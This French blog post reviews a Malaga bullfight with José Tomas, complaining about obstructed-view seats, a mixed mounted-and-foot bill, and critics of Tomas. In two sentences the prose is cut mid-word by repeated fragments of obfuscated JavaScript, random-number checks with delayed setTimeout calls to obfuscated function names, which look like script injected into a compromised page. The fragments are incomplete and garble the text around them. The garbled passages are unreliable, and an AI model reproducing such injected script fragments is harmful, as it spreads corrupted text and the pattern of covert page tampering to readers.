RETOMBEES DE MALAGA

Loin d’avoir épuisé son analyse, la corrida la plus importante de Malaga –celle avec José Tomas, quoiqu’en pense certains- génère des remarques intéressantes.

D’abord en premier, un carton jaune à la empresa Cutiño. C’est une arnaque au public que de vendre les entrées file 1 de « grada » à l’ombre -60 euros – en étant à la même hauteur que les chaises placées en delantera des gradins et ainsi il devenait impossible de voir l’autre moitié de l’arène, comme cela m’est arrivé. j’ai dû presque deviner le tiers de piques et tout ce qui s’est produit à proximité des barrières qui étaient en dessous, en regardant entre les aisselles de l’un, la tête de l’autre et faisant mille pirouettes pour ne rien rater.

Heureusement que José Tomas réalisa ses deux faenas au centre de l’arène. Cependant ce mépris du public est inadmissible. Pepe Cutiño, dont la carrière exemplaire l’a conduit à avoir une réputation d’organisateur sérieux, ne devrait pas manquer de respect ni au public qui pourrait lui faire défaut ni à soi-même. Au cas où, sachez-le : quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and à Malaga on vous vend des entrées au guichet file 1 des gradas, ne les prenez pas, c’est un hold-up.

Ensuite, en second, j’espère que le « mano à mano » entre un torero à cheval et un autre à pied n’est qu’un anecdotique hommage de ceux à pied et que ce non sens ne se reproduise plus. Celle à cheval et celle à pied sont deux tauromachies différentes, aussi opposées à la base, que les associer est aussi absurde que de le faire avec un match de foot et un autre de basket.

La ligne des picadors n’a pas été peinte jusqu’à ce que le navarrais Pablo Hermoso de Mendoza avertisse à son premier toro. Heureusement que José Tomas, vigilant garant des traditions, loin de tomber dans des « modernismes » absurdes, fit le paseo comme cela a toujours été le cas quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il y a eu un rejoneador à l’affiche : derrière-lui et non à ses côtés.

Et je précise bien derrière et non devant, comme on put le croire certains téléspectateurs en voyant les trompeuses images de la dernière émission de Tendido Cero, qui rayèrent des tablettes Pablo Hermoso et montrèrent José Tomas devant Manuel Manzanares qui était sobresaliente.

Cela m’amène à l’analyse que certains francs tireurs de la critique ont faite du triomphe incontestable de José Tomas. Devant l’impossibilité d’en parler mal pour ne pas tomber dans le ridicule, ils ont profité de la moindre occasion pour lancer des piques afin de démériter sa prestation.

L’écran de fumée utilisé par un torero aussi imposteur que Ponce et d’autres toreros, avec tout ce qu’ils coûtent, et qui n’arrivent pas à remplir les arènes, se transforme en une tentative pour délayer ce qui est extraordinaire comme si cela ne l’était pas. En écoutant, par exemple, Javier Hurtado il semblerait que tous ceux qui nous déplaçons pour voir José Tomas sommes des crétins et s’il triomphe c’est grâce à ses partisans –et non au public- qui lui garantissent à l’avance le succès.

D’autres continuent à se plaindre comme quoi José Tomas évite les figuras. Existe-t-il quelqu’un d’aussi aveugle pour croire tous ces bobards ? Peur, de qui ? Peut-être de se confronter à sa propre histoire, à sa propre légende, n’est-ce pas plus dur et compliqué que de le faire avec n’importe quel torero d’aujourd’hui ? Qu’il le fasse ou non c’est une question de liberté, et José Tomas est l’être le plus libre que je n’ai jamais connu. Cela dérange aussi tous ceux qui ont renoncé à l’être, de la même façon que la médiocrité ambiante ne supporte pas l’exceptionnel.

Les commentaires sont fermés.